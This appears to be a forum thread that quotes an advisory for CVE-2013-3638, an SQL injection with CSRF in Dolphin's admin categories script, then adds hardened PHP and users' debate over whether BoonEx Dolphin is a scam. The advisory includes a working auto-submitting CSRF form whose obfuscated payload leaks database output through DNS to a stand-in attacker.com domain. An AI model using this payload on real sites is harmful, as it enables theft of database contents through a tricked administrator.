SQL Injection in Dolphin: CVE-2013-3638

The vulnerability exists due to insufficient validation of the "pathes[]" HTTP POST parameter passed to the "/administration/categories.php" PHP script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so, an attacker should trick a logged-in application administrator into visiting a web page with the CSRF exploit.

The basic CSRF exploit code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The exploit will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

```html
<form action="http://[host]/administration/categories.php" method="post" name="main">
<input type="hidden" name="pathes[]" value="1%%(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- %%1">
<input type="hidden" name="action_disable" value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
```
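A defender-side counterpart to the advisory above, added here as an example and not Dolphin's or BoonEx's own code: the two controls that break this chain, a per-session CSRF token check (so a forged cross-site POST is rejected before any query runs) and strict validation plus parameter binding for every `pathes[]` entry (so no SQL from the request body reaches the database). The table and column names, the `csrf_token` session key and the assumption that `pathes[]` carries numeric category ids are illustrative; adjust the allowlist to the real format.

```php
<?php
// Added example (not Dolphin's code): hardened handling of a POST array like
// pathes[] in an admin script. Table/column names, the session key and the
// "numeric id" format of pathes[] are assumptions for illustration.
declare(strict_types=1);

function verify_csrf_token(array $post, array $session): bool {
    // Token is issued per session and compared in constant time; a page on
    // another origin cannot read it, so a forged auto-submitting form fails here.
    return isset($post['csrf_token'], $session['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

function normalize_pathes(array $raw): array {
    // Each entry must be a positive integer id. Anything else (such as the
    // "1%%(select load_file(...)) -- %%1" payload) aborts the request instead
    // of being interpolated into SQL.
    $ids = [];
    foreach ($raw as $value) {
        if (!is_string($value) || !preg_match('/\A[1-9][0-9]{0,9}\z/', $value)) {
            throw new InvalidArgumentException('pathes[] must contain numeric ids');
        }
        $ids[] = (int) $value;
    }
    return $ids;
}

function disable_categories(PDO $db, array $ids): int {
    if ($ids === []) {
        return 0;
    }
    // One placeholder per id; values are bound by the driver, never concatenated.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare(
        "UPDATE sys_categories SET Status = 'disabled' WHERE ID IN ($placeholders)"
    );
    $stmt->execute($ids);
    return $stmt->rowCount();
}

// Request handling (assumes an existing session and a PDO connection in $db).
session_start();
if (!verify_csrf_token($_POST, $_SESSION)) {
    http_response_code(403);
    exit('invalid CSRF token');
}
if (isset($_POST['action_disable'])) {
    $ids = normalize_pathes((array) ($_POST['pathes'] ?? []));
    disable_categories($db, $ids);
}
```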
is that true??
frankly, I want to buy BoonEx Dolphin, but I am so hesitant with all the news .. I have seen hundreds of news stories about BoonEx Dolphin being a scam. Can you convince me ???

If you read the CVE notes, you'll see this was fixed in Dolphin 7.1.3. Not to mention this requires admin access to work.
BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
You say you want to be convinced that BoonEx Dolphin is not a scam? Well, you see, I am not one of the seasoned pros and I haven't purchased a license at all. I use the software to run a small social network. I have no interest one way or the other as to what software others use.
However, when it comes to bugs, all software has them. I have seen WordPress exploits that basically open up one's system - yet no one runs around calling WordPress a scam. Lord only knows anyone who has used a Microsoft system has certainly been exposed to shoddy code that can be exploited. That's why they put out so many updates and service packs every time they release new software. My point is bugs don't make something a scam.
Now the truth is, most things of value will have a backlash of haters that scream it's a scam. It happens to most businesses that reach a certain level of awesomeness. Now mix that with the fact that the first few versions of Dolphin had a rocky start.... and you get tons of complainers swearing it's a scam.
However, if you look at the evidence, it doesn't support the claim of scam. BoonEx Dolphin is the single most used social networking software in existence. It's used by almost every dating site, and more than 50% of social sites (that are not mainstream custom-built social sites) use Dolphin. You doubt these numbers?
Do a simple search on Google for "modules/boonex -dolphin.com" or for "modules/boonex/avatar -boonex.com" and you will see just how many sites actually use the software. You will find listings for colleges using the software, planet saved, parent finder, fishing buddies.... there are so many sites that use the software it's impossible to list them all.
I BELIEVE Dolphin is actually the number 3 web script on the internet, coming in 3rd to WordPress and Joomla.
If it's the price that makes people call it a scam, let me say BoonEx, for what it offers, is actually VERY CHEAP. Hell, most quality marketers pay more than $200 a MONTH just for AWeber to maintain a mailing list for them.
Go price the crappy yet simple scripts that exist out there. For example, price the software if you want to set up something simple like a safelist or a traffic exchange. Those are programs that can do one thing and one thing only, and they cost as much as BoonEx Dolphin (for example, do a search for LFMTE or LFMVM), yet they can only be used for one thing. At least BoonEx can be configured countless ways and used to run any number of membership-based sites, social network sites, or dating sites - and did I mention it's 100% free?
You only have to pay (for 7.1.x) if you want the ads removed and proper support. Nothing stops anyone from downloading it, examining the code, and using it for free. THAT is NOT a scam by any means - that's more of a "know what you are getting before you pay for it" type of issue.
In any event, I hope this helps you see BoonEx is not a scam by any stretch of the imagination.
Furthermore, look at the dates on the "scam" claims. They are very outdated.
Geeks, making the world a better place

Do you even understand what a "scam" is?
so much to do....
Do you even understand what a "scam" is?
Parashank, has your full-width mod been updated lately? I just noticed the update date changed to 07.05.15 and thought maybe it was updated ...
Proud Hosted by Zarconia.net
Parashank, has your full-width mod been updated lately? I just noticed the update date changed to 07.05.15 and thought maybe it was updated ...
nop
so much to do....
RE
frankly, I want to buy BoonEx Dolphin, but I am so hesitant with all the news .. I have seen hundreds of news stories about BoonEx Dolphin being a scam. Can you convince me ???
Yeah... it's a textbook scam. BoonEx provides a working software product that they've spent thousands of hours developing to you for a few hundred dollars. What a fckn ripoff!
My opinions expressed on this site in no way represent those of BoonEx or BoonEx employees.